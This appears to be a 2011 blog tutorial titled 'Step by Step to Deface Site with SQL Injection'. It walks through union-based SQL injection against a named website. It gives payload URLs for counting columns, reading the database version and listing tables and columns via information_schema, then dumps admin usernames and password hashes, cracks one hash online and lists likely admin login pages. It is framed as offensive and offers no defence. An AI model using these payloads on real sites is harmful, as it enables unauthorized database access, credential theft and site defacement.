News

Step by Step to Deface Site with SQL Injection

Diposting pada tanggal 18 April 2011

What is SQL injection ?


SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data respectively.SQL is used to design the databses. The information is stored in databses. SQL injection is the vulnerability occuring in database layer of application which allow attacker to see the contents stored in database. This vulnerabilty occures when the user's input is not filtered or improperly filtered.Example the webpages links in format :

www.klatenweb.com/something.php?something=something

Some basics-:

Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.




  

We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose 'admin' table, it has columns id,username,password,email.

What is information_schema ?

It is information database present in all SQL database severs(version>5) by default. It contains information like names of tables,columns present in all other databases.



We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.


 

Step1.Find number of columns.

Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number,  say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL


http://www.klatenweb.com/news/news.php?id=130 order by 10--


Actually we instructed it sort the result by 10th column. But it returned us with an error,this means number of columns are less then 10. Lets replace it with 9.

 

Step 2.Find vulnerable columns.

Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.


http://www.klatenweb.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--.


We would get a couple of numbers on screen. The bold ones are the most vulnerable columns. In this case the most vulnerable is number 2.

 

Step 3. Find database version.


Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).


http://www.klatenweby.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6--


We got the version on screen. It is. The only thing to note is that version is 5 point something that is greater than 5. We would have followed some other approach in case the version would be less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of
other databases. in version less than 5.

 

Step 4. Finding table names.


Replace vulnerable column no. with "table_name".


http://www.klatenweb.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--


We got first table name on the screen.


 

To get all tables use group_concat

http://www.klatenweb.com/news/news.php?id=-130
union select all 1,group_concat(table_name),3,4,5,6 from
information_schema.tables where table_schema=database()--

 

Step 5 .Finding column names.


Simlary get all the columns by simply replacing 'table' with 'column'


http://www.klatenweb.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--


There is a repeating element like in this case is 'id' .From it, we come to know which table number has which columns.

 

 

Step 6.Fetching data from columns.


We can fetch the data stored in any column. But the interesting ones here are username and password. These columns are in first table that is tar_admin. "0x3a" is used
simply to insert a colon in result  to separate it, it is hex of colon.

http://www.klatenweb.com/news/news.php?id=-130 union select all
1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--



So finally we got the usernames and passwords on screen. But passwords are encrypted. Mostly these encryptions are crackable. Lets choose any username say "Sneds". The password in encrypted form is
7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to

http://md5crack.com/crackmd5.php and put the hashed(encrypted) password
here.


And it would crack for us. We got 'oorwullie' in result ( password in clear text).

 



Note:Hashes are type of encryptions which are irreversible.  There
are numberless online crackers  available. Keep trying. Sometimes very
strong hashes can not be cracked. 

 

Where is the login panel or login page of website ?


So you got the key, where is lock now ? Most of the websites have login pages at default locations. There is any website, say www.klatenweb.com. The login page would be at
www.klatenweb.com/admin , www.klatenweb.com/administrator , www.klatenweb.com/adminlogin etc.

 

Versi cetak

Related Keywords

by step, crackable, deface, deface sql injection, encrypted, password, site, sql injection, to, with, step

Direkomendasikan

+ Cara Menghapus Semua Tweet Di Twitter Mudah dan Cepat
+ Celah keamanan percakapan WhatsApp konten teks dan link
+ Cara mengamankan printer online dari Hacker
+ Cara mudah hapus akun Facebook tanpa kehilangan data
+ Cara Menonaktifkan Update Otomatis Di Mozilla Firefox
+ Cara mudah menghapus semua email di Gmail
Tentang KLATENWEB

Jasa pembuatan aplikasi web berbasis PHP dan MySQL, Web Portal, Personal, Toko Online, Sistem Informasi Akademik, SIMPeg dan Rumah Sakit, Aplikasi Facebook, dan lain sebagainya termasuk penyedia domain dan hosting unlimited murah.


Message Me On Whatsapp